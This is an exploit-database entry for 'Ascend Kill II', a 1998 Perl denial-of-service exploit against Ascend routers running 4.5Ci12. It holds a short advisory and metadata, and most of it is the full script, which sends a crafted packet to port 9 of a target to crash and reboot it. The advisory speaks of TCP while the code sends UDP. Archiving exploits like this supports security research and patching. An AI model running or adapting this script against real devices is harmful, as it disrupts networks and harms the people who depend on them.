Ascend Kill II - perl version

vendor:

Routers

by:

Rootshell

7.5

CVSS

HIGH

Denial of Service Attack

N/A

CWE

Product Name: Routers

Affected Version From: 4.5Ci12

Affected Version To: 4.5Ci12

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1998

Ascend Kill II – perl version

A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.

Mitigation:

N/A

Source

Exploit-DB raw data:

#
#source: https://www.securityfocus.com/bid/1855/info
# 
#A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 #or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.
# 
#Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable.
#

#!/usr/bin/perl

#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
#  NOTE: This program is NOT to be used for malicous purposes.  This is
#        intenteded for educational purposes only.  By using this program
#        you agree to use this for lawfull purposes ONLY.
#
#

use Socket;

require "getopts.pl";

sub AF_INET {2;}
sub SOCK_DGRAM {2;}

sub ascend_kill {
  $remotehost = shift(@_);
  chop($hostname = `hostname`);
  $port = 9;
  $SIG{'INT'} = 'dokill';
  $sockaddr = 'S n a4 x8';
  ($pname, $aliases, $proto) = getprotobyname('tcp');
  ($pname, $aliases, $port) = getservbyname($port, 'tcp')
  unless $port =~ /^\d+$/;
  ($pname, $aliases, $ptype, $len, $thisaddr) =
  gethostbyname($hostname);
  $this = pack($sockaddr, AF_INET, 0, $thisaddr);
  ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
  $that = pack($sockaddr, AF_INET, $port, $thataddr);
  socket(S, &AF_INET, &SOCK_DGRAM, 0);
    $msg = pack("c64",
    0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
    0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
    0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
    0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
    0x50, 0x41, 0x53, 0x53);
  for ($i=0; $i<500; $i++) {
    $msg .= pack("c1", 0xff);
  }
  send(S,$msg,0,$that) || die "send:$!";
}

if ($ARGV[0] eq '') {
  print "usage: akill2.pl <remote_host>\n";
  exit;
}

&ascend_kill($ARGV[0]);